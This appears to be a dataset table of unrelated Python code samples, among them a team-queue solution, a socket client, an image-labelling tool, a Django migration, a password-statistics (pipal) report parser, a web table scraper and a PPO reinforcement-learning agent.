index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
994,200 | b49c9caaba16a6917e0f337c50dadc75e6dd4718 | from sys import stdin
from collections import deque
"""
# sin guardar los equipos
def main():
conta = 1
n = int(stdin.readline())
while n != 0:
print("Scenario","#"+str(conta))
teams = deque()
for i in range(n):
m = list(stdin.readline().split())
teams += deque(m[1:])
cola = deque()
com = list(stdin.readline().split())
while com[0] != "STOP":
if com[0] == "ENQUEUE":
cola.append(com[1])
else:
print(cola.popleft())
com = list(stdin.readline().split())
conta+=1
print()
n = int(stdin.readline())
main()
"""
# guardando loes equipos :V :V
def main():
conta = 1
n = int(stdin.readline())
while n != 0:
print("Scenario","#"+str(conta))
nteam = [0] * 1000000 # 0...999999
for i in range(n):
m = list(map(int,stdin.readline().split()))
for j in m[1:]:
nteam[j] = i
cola = deque()
teams = []
for i in range(n):
teams.append(deque())
com = list(stdin.readline().split())
while com[0] != "STOP":
if com[0] == "ENQUEUE":
x = int(com[1])
team = nteam[x] # revision a que equipo pertenece
if teams[team]:
teams[team].append(x)
else:
teams[team].append(x)
cola.append(teams[team])
else:
t = cola.popleft()
print(t.popleft())
if t:
cola.appendleft(t)
com = list(stdin.readline().split())
conta+=1
n = int(stdin.readline())
print()
main()
|
994,201 | dafb5bcde2d1cc8014266c54cd986c20f13dd9d8 | import serial
import time
import configparser
import os
from helpers import parseData, buildSerial
def main():
config = configparser.ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), "config.ini"))
print("Starting serial connection")
ser = buildSerial(config["APP"]["DEVICE"])
while True:
if(ser.inWaiting() > 0):
data = ser.readline().decode("ascii").rstrip()
print(data)
parseData(data)
time.sleep(0.5)
if __name__ == '__main__':
main()
|
994,202 | 57960d32fc3e22ea87791478537f34fcd46ead4c | from flask import Flask
app = Flask(__name__)
@app.route('/')
def hello_world():
return 'Hello World!'
def user_login(func):
def inner():
print('登录')
func()
return inner
@user_login
def news():
print('新闻详情')
news()
# show_news = user_login(news)
# show_news()
# print(show_news.__name__)
if __name__ == '__main__':
app.run()
|
994,203 | e2fd602e017a91e9ad025f7bed6a03810af885d1 | # -*- coding: utf-8 -*-
# this file is generated by gen_kdata_schema function, dont't change it
from zvt.domain.quotes.stock.stock_1d_money_flow import *
from zvt.domain.quotes.stock.stock_1m_kdata import *
from zvt.domain.quotes.stock.stock_1m_hfq_kdata import *
from zvt.domain.quotes.stock.stock_5m_kdata import *
from zvt.domain.quotes.stock.stock_5m_hfq_kdata import *
from zvt.domain.quotes.stock.stock_15m_kdata import *
from zvt.domain.quotes.stock.stock_15m_hfq_kdata import *
from zvt.domain.quotes.stock.stock_30m_kdata import *
from zvt.domain.quotes.stock.stock_30m_hfq_kdata import *
from zvt.domain.quotes.stock.stock_1h_kdata import *
from zvt.domain.quotes.stock.stock_1h_hfq_kdata import *
from zvt.domain.quotes.stock.stock_4h_kdata import *
from zvt.domain.quotes.stock.stock_4h_hfq_kdata import *
from zvt.domain.quotes.stock.stock_1d_kdata import *
from zvt.domain.quotes.stock.stock_1d_hfq_kdata import *
from zvt.domain.quotes.stock.stock_1d_bfq_kdata import *
from zvt.domain.quotes.stock.stock_1wk_kdata import *
from zvt.domain.quotes.stock.stock_1wk_hfq_kdata import *
from zvt.domain.quotes.stock.stock_1wk_bfq_kdata import *
from zvt.domain.quotes.stock.stock_1mon_kdata import *
from zvt.domain.quotes.stock.stock_1mon_hfq_kdata import *
from zvt.domain.quotes.stock.stock_1mon_bfq_kdata import *
from zvt.domain.quotes.stock.stock_emotion_factor import *
from zvt.domain.quotes.stock.stock_growth_factor import *
from zvt.domain.quotes.stock.stock_momentum_factor import *
from zvt.domain.quotes.stock.stock_pershare_factor import *
from zvt.domain.quotes.stock.stock_quality_factor import *
from zvt.domain.quotes.stock.stock_risk_factor import *
from zvt.domain.quotes.stock.stock_style_factor import *
from zvt.domain.quotes.stock.stock_technical_factor import *
from zvt.domain.quotes.stock.stock_basics_factor import *
|
994,204 | 7de977bef33c341a368e81f45ab87ee2566b3afa | from socket import *
#获取计算机名称
hostname=gethostname()
#获取本机IP
ip=gethostbyname(hostname)
clientPort=7179 #如何在未连接前得知自己的本地端口号?
serverName = 'localhost'
serverPort = 12000
clientSocket = socket(AF_INET, SOCK_STREAM) # 用socket函数来创建客户套接字。第一个参数指示底层网络使用的是IPv4。第二个参数指示该套接字是SOCK_STREAM 类型。这表明它是一个 TCP 套接字,而不是一个 UDP 套接字。
print('A client is running.')
print("The client address: ('", str(ip), "', ", str(clientPort), ')')
clientSocket.connect((serverName, serverPort))
print('Connected to ', serverName, ':', serverPort, '.') # connect()方法的参数是这条连接中服务器端的地址。这行代码执行完后,执行三次握手,并在客户和服务器之间创建起一条TCP连接。一般address的格式为元组(hostname,port)
while True:
sentence = input('Send a request:')
clientSocket.send(sentence.encode()) # 向服务器发送字符串sentence
modifiedSentence = clientSocket.recv(1024) # 接收
if sentence == 'Time':
print('Received the current system time on the server: ',modifiedSentence.decode(),'.') # 字符串modifiedSentence
elif sentence == 'Exit':
print('Received a response: ',modifiedSentence.decode())
break
clientSocket.close() # 关闭套接字
|
994,205 | bfef6782ecca067645aaf2556a11714c91c0995b | # This one is like your scripts with argv
def print_two(*args):
arg1, arg2 = args
print(f"arg1: {arg1}, arg2: {arg2}")
# Ok, thats *args is actually pointless, we can just do this
def print_two_again(arg1, arg2):
print(f"arg1: {arg1}, arg2: {arg2}")
# This jest takes one argument
def print_one(arg1):
print(f"arg1: {arg1}")
# This one takes no arguments
def print_none():
print("I got notin'.")
print_two("Michael","Leslie")
print_two_again("Michael","Leslie")
print_one("First!")
print_none()
|
994,206 | e1a41ea1fcd7d21060a8071b75d592f413163003 | import os
import Tkinter as tk
import sqlite3
import logging
import threading
import time
import numpy as np
from PIL import Image, ImageTk
from collections import deque
from argparse import ArgumentParser
logging.basicConfig()
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def load_raw_images(folder):
raw_images = []
if os.path.isdir(folder):
logger.info('loading %s...' % (folder))
files = os.listdir(folder)
for filename in files:
if filename.endswith('.jpg'):
filepath = os.path.join(folder, filename)
pil_image = Image.open(filepath)
raw_images.append([filepath, np.array(pil_image)])
else:
logger.info('ERROR %s is not found.' % (folder))
return raw_images
class Saver(object):
def __init__(self, db_name, table_name):
self.table_name = table_name
self.db_name = db_name
def run(self):
self.connection = sqlite3.connect(self.db_name)
self.cursor = self.connection.cursor()
self.cursor.execute("""CREATE TABLE IF NOT EXISTS %s(
id INTEGER PRIMARY KEY AUTOINCREMENT,
image BLOB NOT NULL,
width INTEGER NOT NULL,
height INTEGER NOT NULL,
label TEXT NOT NULL);""" % (self.table_name))
self.entry = deque()
self.running = True
while self.running:
if len(self.entry) > 0:
e = self.entry.popleft()
logger.info('saving entry %s: %s' % (e[0].shape, str(e[1])))
self.cursor.execute(("""INSERT INTO %s(image, width, height, label)
VALUES(?, ?, ?, ?);""" % self.table_name),
(buffer(e[0].reshape(-1)), e[0].shape[1], e[0].shape[0], str(e[1]),))
time.sleep(0.5)
logger.info('flusing data...')
while len(self.entry) > 0:
e = self.entry.popleft()
self.cursor.execute(("""INSERT INTO %s(image, width, height, label)
VALUES(?, ?, ?, ?);""" % self.table_name),
(buffer(e[0].reshape(-1)), e[0].shape[1], e[0].shape[0], str(e[1]),))
self.connection.commit()
self.connection.close()
def save_async(self, image, label):
logger.info('%s:%s' % (str(image.shape), str(label)))
self.entry.append([image, str(label)])
def start(self):
self.task = threading.Thread(target=self.run)
self.task.start()
class LabelUI(object):
def __init__(self, db_name, table_name,
images, image_width=640, image_height=480):
self.saver = Saver(db_name, table_name)
self.saver.start()
self.width = image_width
self.height = image_height
self.root = tk.Tk()
self.root.protocol("WM_DELETE_WINDOW", self.on_close)
self.canvas = tk.Canvas(self.root,
width=image_width, height=image_height)
self.canvas.bind('<ButtonPress-1>', self.on_press)
self.canvas.bind('<B1-Motion>', self.on_move)
self.canvas.bind('<ButtonRelease-1>', self.on_release)
self.canvas.pack(side=tk.LEFT)
self.labeling_panel = tk.PanedWindow(self.root)
self.save_button = tk.Button(self.labeling_panel, text='Save',
command=self.save_image)
self.save_button.pack(side=tk.TOP)
self.skip_button = tk.Button(self.labeling_panel, text='Skip',
command=self.skip_image)
self.skip_button.pack(side=tk.TOP)
self.remove_last_button = tk.Button(self.labeling_panel, text='Remove Last',
command=self.remove_last)
self.remove_last_button.pack()
block_choise = [
['H', 'H'],
['I', 'I'],
['W', 'W'],
['N', 'N'],
['R', 'R'],
['O', 'O'],
['B', 'B'],
['T', 'T'],
['2', '2'],
['0', '0'],
['1', '1'],
['7', '7'],
['others', 'others']
]
self.choise_var = tk.StringVar(self.labeling_panel, value=block_choise[0][0])
self.choise = []
for text, mode in block_choise:
b = tk.Radiobutton(self.labeling_panel,
text=text,
value=mode,
variable=self.choise_var,
indicatoron=1)
b.deselect()
b.pack(anchor=tk.W)
self.choise.append(b)
self.labeling_panel.pack(side=tk.RIGHT)
self.image_index = 0
self.images = images
self.rois = []
self.mouse_press = False
if len(self.images) == 0:
logger.info('no image found')
self.on_close()
self.load_image()
def on_close(self):
self.saver.running = False
self.root.destroy()
def load_image(self):
image = self.images[self.image_index][1]
img = Image.fromarray(image)
self.tk_image = ImageTk.PhotoImage(img)
self.canvas.create_image(
self.width / 2, self.height / 2, image=self.tk_image)
def on_press(self, event):
self.mouse_press = True
self.sx = event.x
self.sy = event.y
self.cx = event.x
self.cy = event.y
self.render()
def on_move(self, event):
self.cx = event.x
self.cy = event.y
self.render()
def on_release(self, event):
self.mouse_press = False
self.cx = event.x
self.cy = event.y
if self.choise_var.get() != '':
self.rois.append([self.sx, self.sy, self.cx, self.cy, self.choise_var.get()])
self.render()
def render(self):
text_padding = 10
self.load_image()
for roi in self.rois:
self.canvas.create_rectangle(roi[0], roi[1],
roi[2], roi[3], width=2, outline='green')
self.canvas.create_text(roi[0], roi[1] - text_padding, text=roi[4],
fill='green', width=2)
# draw temp
if self.mouse_press:
self.canvas.create_rectangle(self.sx, self.sy, self.cx, self.cy, width=2,
outline='red')
self.canvas.create_text(self.sx, self.sy - text_padding,
text=self.choise_var.get(),
width=2, fill='red')
def remove_last(self):
if len(self.rois) > 0:
self.rois = self.rois[:-1]
self.render()
def load_next(self):
self.image_index += 1
if self.image_index == len(self.images):
logger.info('done labeling, closing...')
self.on_close()
else:
self.load_image()
self.render()
def skip_image(self):
self.rois = []
self.load_next()
def save_image(self):
self.saver.save_async(self.images[self.image_index][1], self.rois)
self.skip_image()
def start(self):
self.root.mainloop()
def main():
parser = ArgumentParser()
parser.add_argument('--db-name', dest='db_name',
default='duckymomo.sqlite3', help='output database name',)
parser.add_argument('--table-name', dest='table_name',
default='blocks', help='output database name',)
parser.add_argument('--folder', dest='folder',
default='duckymomo', help='input image folder')
args = parser.parse_args()
images = load_raw_images(args.folder)
ui = LabelUI(args.db_name, args.table_name, images)
ui.start()
if __name__ == '__main__':
main()
|
994,207 | 5d6dcce87357fc354b96057b804d4b424f9485a6 | fold_model = "./results/svm_ovr/"
if not os.path.exists(fold_model):
os.makedirs(fold_model)
clf =svm.LinearSVC(class_weight= 'balanced', verbose = 1)
mc= multiclass.OneVsRestClassifier(clf)
accs = []
for j in n_shuffles:
#np.random.shuffle(index)
index = index_list[j]
X = XX[index, :]
Y = TT[index, :]
n_train=int(n*trainpercentile)
n_test=n-n_train
X_train = X[0:n_train,:].astype(np.float32)
X_test = X[n_train:n,:].astype(np.float32)
Y_train=Y[0:n_train,:]
Y_test=Y[n_train:X.shape[0],:]
Y_true=np.argmax(Y_test,1)
Yt=np.argmax(Y_train,1)
feats = [np.zeros(268)]
clf.fit(X_train,Yt)
for estim in mc.estimators_:
feats = np.append(feats,[estim.coef_], axis=0)
io.savemat(fold_model +'features_fold_' + str(j)+ '.mat', {'features': feats})
yPred = clf.predict(X_test)
acc = metrics.accuracy_score(Y_true, yPred)
accs.append(acc)
df = pd.DataFrame(data={'true':Y_true ,'pred': yPred})
df.to_csv(fold_model+'res_fold_' +str(j) + '.csv', index = False)
print('Fold= ', j, ' completed ' )
j = j + 1
print('SVM OVR end...') |
994,208 | 7d74b4afebc4d9c1817065d7bc2f220f7c73326a | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('text', models.TextField()),
('author', models.ForeignKey(related_name='comments', to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Host',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=50)),
('startup', models.CharField(max_length=50, null=True, blank=True)),
('time', models.DateTimeField(null=True, blank=True)),
('is_current', models.BooleanField(default=False)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('text', models.TextField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('author', models.ForeignKey(related_name='questions', to=settings.AUTH_USER_MODEL)),
('host', models.ForeignKey(related_name='questions', to='ama.Host')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Subscriber',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('email', models.EmailField(max_length=75)),
('host', models.ForeignKey(related_name='subscribers', to='ama.Host')),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='comment',
name='question',
field=models.ForeignKey(related_name='comments', to='ama.Question'),
preserve_default=True,
),
]
|
994,209 | 2a692b65ced5359ea58844975957102dcca28bc5 | # -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
"""幸运数字猜猜猜 2.0 于文斌 2020年5月30日"""
import random
random.randint(0,9)
n=1
while n<4:
number= input("请您猜0-9中一个数字")
guess=int(number)
if n==3:
if guess==random.randint(0,9):
print("恭喜您,GOODLUCK!")
print("您和python太有缘分了,lets go on!")
break
else:
print("对不起次数已经用尽")
break
if guess==random.randint(0,9):
print("恭喜您,GOODLUCK!")
print("您和python太有缘分了,lets go on!")
break
else:
if guess>random.randint(0,9):
print("抱歉您猜大了,请再猜一次")
else:
print("抱歉您猜小了,请再猜一次")
n=n+1
print("GAME OVER")
|
994,210 | cdc3df62293bf5c8023d84437ab7d99cccdaa6cb | # Source : https://oj.leetcode.com/problems/sqrtx/
# Author : Ping Zhen
# Date : 2017-04-17
'''**********************************************************************************
*
* Implement int sqrt(int x).
*
* Compute and return the square root of x.
*
**********************************************************************************''' |
994,211 | f6edf0d4e9229e6198674ae62bd6873c91bbc730 | from os import makedirs
from os.path import join, split, isdir
import create_eml
import db
import media_download_stats as stats
import pandas
def mkdir_if_not_exists(directory):
if not isdir(directory):
makedirs(directory)
def convert_filepath_to_urlpath(filepath):
return 'https://www.morphosource.org/rss' + filepath.split('tmp')[1]
def get_num_mf_derived_from(mf_id):
conn = db.db_conn()
c = conn.cursor()
sql = """
SELECT * FROM `ms_media_files`
WHERE `derived_from_media_file_id` = %s
"""
db_result = db.db_execute(c, sql, mf_id)
return len(db_result)
def get_num_m_derived_from(m_id):
conn = db.db_conn()
c = conn.cursor()
sql = """
SELECT * FROM `ms_media`
WHERE `derived_from_media_id` = %s
"""
db_result = db.db_execute(c, sql, m_id)
return len(db_result)
def gen_csv(recordset, csvpath):
mkdir_if_not_exists(split(csvpath)[0])
conn = db.db_conn_socket()
c = conn.cursor()
sql = """
SELECT * FROM `ms_media_download_stats` AS s
LEFT JOIN `ca_users` AS u ON u.user_id = s.user_id
LEFT JOIN `ms_media_files` AS mf ON mf.media_file_id = s.media_file_id
LEFT JOIN `ms_media` AS m ON m.media_id = s.media_id
LEFT JOIN `ms_specimens` as sp ON sp.specimen_id = m.specimen_id
LEFT JOIN `ms_specimens_x_taxonomy` AS sxt ON sxt.specimen_id = sp.specimen_id
LEFT JOIN `ms_taxonomy_names` AS t ON t.alt_id = sxt.alt_id
WHERE `recordset` = %s
"""
download_requests = db.db_execute(c, sql, recordset)
mf_dict = {}
mg_dict = {}
for dl in download_requests:
if 'media_file_id' in dl and dl['media_file_id'] is not None:
print dl['media_file_id']
mf_id = dl['media_file_id']
if mf_id not in mf_dict:
mf_dict[mf_id] = []
mf_dict[mf_id].append(dl)
if 'media_id' in dl and dl['media_id'] is not None:
mg_id = dl['media_id']
if mg_id not in mg_dict:
mg_dict[mg_id] = []
mg_dict[mg_id].append(dl)
m_stats = {}
for mg_id, mg_array in mg_dict.iteritems():
m_stats[mg_id] = {
'mg_array': mg_array,
'mg_stats': stats.MediaDownloadStats(mg_array),
'mf_dict': {},
'mf_stats_dict': {}
}
for mf_id, mf_array in mf_dict.iteritems():
mg_id = mf_array[0]['media_id']
m_stats[mg_id]['mf_dict'][mf_id] = mf_array
m_stats[mg_id]['mf_stats_dict'][mf_id] = stats.MediaDownloadStats(mf_array)
usage_report = pandas.DataFrame(columns=
['media_file_id',
'media_file_derived_from',
'num_media_files_derived_from_this',
'media_group_id',
'media_group_derived_from',
'num_media_groups_derived_from_this',
'specimen_id',
'specimen_institution_code',
'specimen_collection_code',
'specimen_catalog_number',
'specimen_genus',
'specimen_species',
'total_downloads',
'dl_intended_use_School',
'dl_intended_use_School_K_6',
'dl_intended_use_School_7_12',
'dl_intended_use_School_College_Post_Secondary',
'dl_intended_use_School_Graduate_school',
'dl_intended_use_Education',
'dl_intended_use_Education_K_6',
'dl_intended_use_Education_7_12',
'dl_intended_use_Education_College_Post_Secondary',
'dl_intended_use_Educaton_general',
'dl_intended_use_Education_museums_public_outreach',
'dl_intended_use_Personal_interest',
'dl_intended_use_Research',
'dl_intended_use_Commercial',
'dl_intended_use_Art',
'dl_intended_use_other',
'dl_intended_use_3d_print',
'total_download_users',
'u_affiliation_Student',
'u_affiliation_Student:_K-6',
'u_affiliation_Student:7-12',
'u_affiliation_Student:_College/Post-Secondary',
'u_affiliation_Student:_Graduate',
'u_affiliation_Faculty',
'u_affiliation_Faculty:_K-6',
'u_affiliation_Faculty:7-12',
'u_affiliation_Faculty_College/Post-Secondary',
'u_affiliation_Staff:_College/Post-Secondary',
'u_affiliation_General_Educator',
'u_affiliation_Museum',
'u_affiliation_Museum_Curator',
'u_affiliation_Museum_Staff',
'u_affiliation_Librarian',
'u_affiliation_IT',
'u_affiliation_Private_Individual',
'u_affiliation_Researcher',
'u_affiliation_Private_Industry',
'u_affiliation_Artist',
'u_affiliation_Government',
'u_affiliation_other',
])
for m_id, s in m_stats.iteritems():
# Add media group row
mg = s['mg_array'][0]
mg_stats = s['mg_stats']
row = {
'media_file_id': None,
'media_file_derived_from': None,
'num_media_files_derived_from_this': None,
'media_group_id': m_id,
'media_group_derived_from': mg['derived_from_media_id'],
'num_media_groups_derived_from_this': get_num_m_derived_from(m_id),
'specimen_id': mg['specimen_id'],
'specimen_institution_code': mg['institution_code'],
'specimen_collection_code': mg['collection_code'],
'specimen_catalog_number': mg['catalog_number'],
'specimen_genus': mg['genus'],
'specimen_species': mg['species'],
'total_downloads': mg_stats.total_downloads,
'total_download_users': mg_stats.total_users
}
for use, num in mg_stats.intended_use_dict.iteritems():
row['dl_intended_use_' + use] = num
for demo, num in mg_stats.user_demo_dict.iteritems():
row['u_affiliation_' + demo.replace(' ', '_')] = num
usage_report = usage_report.append(row, ignore_index=True)
# Add media files row
for mf_id, mf_array in s['mf_dict'].iteritems():
mf_stats = s['mf_stats_dict'][mf_id]
mf = mf_array[0]
row = {
'media_file_id': mf_id,
'media_file_derived_from': mf['derived_from_media_file_id'],
'num_media_files_derived_from_this': get_num_mf_derived_from(mf_id),
'media_group_id': mf['media_id'],
'media_group_derived_from': mf['derived_from_media_id'],
'num_media_groups_derived_from_this': get_num_m_derived_from(mf['media_id']),
'specimen_id': mf['specimen_id'],
'specimen_institution_code': mf['institution_code'],
'specimen_collection_code': mf['collection_code'],
'specimen_catalog_number': mf['catalog_number'],
'specimen_genus': mf['genus'],
'specimen_species': mf['species'],
'total_downloads': mf_stats.total_downloads,
'total_download_users': mf_stats.total_users
}
for use, num in mf_stats.intended_use_dict.iteritems():
row['dl_intended_use_' + use] = num
for demo, num in mf_stats.user_demo_dict.iteritems():
row['u_affiliation_' + demo.replace(' ', '_')] = num
usage_report = usage_report.append(row, ignore_index=True)
usage_report.to_csv(csvpath, index=False, index_label=False)
def gen_eml(recordset, r_name, publisher, p_name, xmlpath, csvpath):
title = 'Download report for MorphoSource media for recordset ' + recordset
desc = 'Report of downloads of MorphoSource media associated with recordset ' + recordset + ' with intended download uses and downloading user profile affiliations.'
link = convert_filepath_to_urlpath(csvpath)
ac = False
create_eml.gen_eml_file(title, desc, link, ac, recordset, r_name, publisher, p_name, xmlpath)
def gen_files(recordset, r_name, publisher, p_name, dirpath):
csvpath = join(dirpath, 'datasets', 'dl.csv')
gen_csv(recordset, csvpath)
gen_eml(recordset, r_name, publisher, p_name, join(dirpath, 'eml', 'dl.xml'), csvpath) |
994,212 | 03614eac51d4afc0a3918b0be3c1c3160ba3e4b9 | import click
from pymongo import MongoClient
import socket
import time
# ------------------------- CLI ----------------------
@click.group()
def cli():
pass
@cli.command()
@click.argument('hostname')
def wait_for_dns(hostname):
__wait_for_dns(hostname)
@cli.command()
def wait_for_local_dns():
__wait_for_dns(socket.gethostname())
@cli.command()
@click.argument('hosts', nargs=-1)
def wait_for_mongo(hosts):
__wait_for_mongo(hosts)
# ------------------------- internal ----------------------
def __wait_for_mongo(hosts):
for host in hosts:
# try to connect for 60s
click.echo("waiting for " + host)
client = MongoClient(host = [host], serverSelectionTimeoutMS = 60000)
client.server_info()
def __wait_for_dns(hostname):
# check for 5 min, we should have a DNS entry by then
for i in range(0,1):
try:
socket.gethostbyname(hostname)
return None
except socket.gaierror as err:
time.sleep(5)
pass
except:
raise
raise TimeoutException("Timed out trying to resolve " + hostname)
class TimeoutException(Exception):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return repr(self.msg)
if __name__ == '__main__':
cli()
|
994,213 | e59a861a4b62bbefeb6b1f0fef5b770a0f77bfc5 | #!/usr/bin/env python3
import argparse
import os
import re
import sys
import time
from reportgen import Reportgen
class Pipal_Eater(object):
def __init__(self):
self.file = None
self.verbose = False
self.version = '0.1'
self.pipal_file_content = {}
self.start_time = time.time()
self.report_generator_module = Reportgen()
def signal_handler(self, signal, frame):
print('You pressed Ctrl+C! Exiting...')
sys.exit(0)
def cls(self):
os.system('cls' if os.name == 'nt' else 'clear')
def cmdargs(self):
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--file', nargs=1, metavar='pipal.txt' ,help='The file containing raw pipal output')
parser.add_argument('-v', '--verbose', help='Optionally enable verbosity', action='store_true')
self.args = parser.parse_args()
def read_file(self):
if self.args.verbose is True:
print('[+] Opening file {}'.format(self.args.file[0]))
try:
with open(self.args.file[0]) as f:
self.pipal_file_content = (f.readlines())
self.pipal_file_content = [x.strip() for x in self.pipal_file_content]
except Exception as e:
print('\n[!] Couldn\'t open file: \'{}\' Error:{}'.format(self.args.file,e))
sys.exit(0)
if self.args.verbose is True:
for line in self.pipal_file_content:
print(''.join(line))
def parse(self):
for i, line in enumerate(self.pipal_file_content):
if 'Total entries' in line:
self.total = line
if 'Total unique' in line:
self.unique = line
#read 11 lines starting with this heading, always 10 long so range 11 works
if 'Top 10 passwords' in line:
self.top_10 = []
for z in range(11):
self.top_10.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
#read 11 lines starting with this heading, always 10 long so range 11 works
if 'Top 10 base words' in line:
self.top_10_base = []
for z in range(11):
self.top_10_base.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
#range is dependent on the length of passwords cracked, 0-??. need to count lines to next if statement first for range
if 'length ordered' in line:
self.lengths = []
for z in range(11):
self.lengths.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
if 'count ordered' in line:
self.counts = []
for z in range(11):
self.counts.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
if 'One to six characters' in line:
self.one_to_six = []
for z in range(15):
self.one_to_six.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
if 'Last number' in line:
self.trailing_number = []
for z in range(11):
self.trailing_number.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
if 'Last digit' in line:
self.last_1digit = []
for z in range(11):
self.last_1digit.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
if 'Last 2 digits' in line:
self.last_2digit = []
for z in range(11):
self.last_2digit.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
if 'Last 3 digits' in line:
self.last_3digit = []
for z in range(11):
self.last_3digit.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
if 'Last 4 digits' in line:
self.last_4digit = []
for z in range(11):
self.last_4digit.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
if 'Last 5 digits ' in line:
self.last_5digit = []
for z in range(11):
self.last_5digit.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
if 'Character sets' in line:
self.charset = []
for z in range(24):
self.charset.append(self.pipal_file_content[(i + z) % len(self.pipal_file_content)])
def report(self):
"""run the docx report. text files happen in the respective functions"""
#i need to figure out how to pass all these in a list or something, woof.
self.report_generator_module.run(\
self.total,\
self.unique,\
self.top_10,\
self.top_10_base,\
self.lengths,\
self.counts,\
self.one_to_six,\
self.trailing_number,\
self.last_1digit,\
self.last_2digit,\
self.last_3digit,\
self.last_4digit,\
self.last_5digit,\
self.charset)
def end(self):
"""ending stuff, right now just shows how long script took to run"""
print('\nCompleted in {:.2f} seconds\n'.format(time.time() - self.start_time))
def main():
run = Pipal_Eater()
run.cls()
run.cmdargs()
run.read_file()
run.parse()
run.report()
run.end()
if __name__ == '__main__':
main()
|
994,214 | d3ac9336de395d1fda5f49b165199654a01693e1 | #!/usr/bin/python3
from subprocess import call, check_output
from sept_demo import init_ir_debian, cmd_to
import os
ain = "AIN1"
min_safe = 1250
ain_path = "/sys/devices/ocp.3/helper.15/" + ain
def main():
init_ir_debian()
sense_loop(1000)
def sense_loop(counter):
while counter > 0:
ir = int(check_output(["cat", ain_path]))
info = "voltage: " + str(ir)
counter -= 1
print(info, "(" + str(counter) + " to go)")
if __name__ == "__main__":
main()
|
994,215 | c02f3ec1acb54ee0aadbf9402bab913fd49a8776 | from selenium import webdriver
import pandas as pd
browser = webdriver.Chrome()
browser.get('https://www.investidorpetrobras.com.br/acoes-dividendos-e-divida/dividendos-e-jcp/')
tabela = browser.find_element_by_css_selector('.tabs-body > div:nth-child(2) > table')
tabela = tabela.get_attribute('outerHTML')
browser.close()
pdtable = pd.read_html(tabela)[0]
pdtable.to_csv('petrobras.csv')
|
994,216 | 2b78c67e5d82ee04d1b01d3a5296ceb4f89f2d88 | # a + b + c = 1000, a ^2 + b ^2 = c ^2
# a,b,c > 0
import math
input = int(raw_input("BLOOP BLEEP: "))
a = 1
b = 1
c = 1
while a < input:
a +=1
b = (input * a - 500 * input)/(a - input)
c = math.sqrt(a ** 2 + b ** 2)
if (b % 2 == 0 or (b + 1) % 2 == 0) and b > 0:
if (c % 2 == 0 or (c + 1) % 2 == 0) and c > 0:
print a * b * c
|
994,217 | 1224646c8bcb066c7d1f691e5b8a4573958e3b43 | import tensorflow as tf
from tensorflow.keras import layers
def gather_action_probabilities(p, action_ids):
gather_indices = tf.stack([
tf.range(tf.shape(action_ids)[0]),
action_ids
], -1)
return tf.gather_nd(p, gather_indices)
def ppo_loss(new_values, values, p, p_old, action_ids, rewards, eps=0.2, c=1.0):
advantage = rewards - values
p = gather_action_probabilities(p, action_ids)
r = p / p_old
l_pg = tf.reduce_min([r * advantage, tf.clip_by_value(r, 1-eps, 1+eps) * advantage], axis=0)
l_v = tf.square(new_values - rewards)
return tf.reduce_mean(-l_pg + c*l_v)
def ce_loss(action_p, state_v, action_ids, rewards):
policy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(
tf.one_hot(action_ids, tf.shape(action_p)[1]),
action_p,
))
value_loss = tf.reduce_mean(tf.square(rewards - state_v))
return policy_loss + value_loss
def train(agent, optimizer, states, old_action_p, action_indices, state_values, rewards):
with tf.GradientTape() as t:
action_p, new_state_values = agent(states)
# loss = ce_loss(action_p, new_state_values, action_indices, rewards)
loss = ppo_loss(new_state_values, state_values, action_p, old_action_p, action_indices, rewards)
grads = t.gradient(loss, agent.trainable_variables)
optimizer.apply_gradients(zip(grads, agent.trainable_variables))
return loss
class Agent(tf.keras.Model):
def __init__(self, board_size, hidden_size=256, num_conv=5):
super(Agent, self).__init__()
self._flatten = layers.Flatten()
self._convolutions = [
layers.Conv2D(filters=hidden_size, kernel_size=(3,3), padding='same', name='conv_%d' % i)
for i in range(num_conv)
]
self._conv_batch_norms = [
layers.BatchNormalization(name='bn_%d' % i)
for i in range(num_conv)
]
self._hidden1 = layers.Dense(2 * hidden_size, name='hidden1')
self._hidden1_bn = layers.BatchNormalization(name='hidden1_bn')
self._hidden2 = layers.Dense(hidden_size, name='hidden2')
self._hidden2_bn = layers.BatchNormalization(name='hidden2_bn')
self._policy = layers.Dense(board_size ** 2, name='policy')
self._value = layers.Dense(1, name='value')
def call(self, state, raw_pi=False):
for i, conv_layer in enumerate(self._convolutions):
bn = self._conv_batch_norms[i]
state = tf.nn.relu(bn(conv_layer(state)))
state = self._flatten(state)
state = tf.nn.relu(self._hidden1_bn(self._hidden1(state)))
state = tf.nn.relu(self._hidden2_bn(self._hidden2(state)))
policy = self._policy(state)
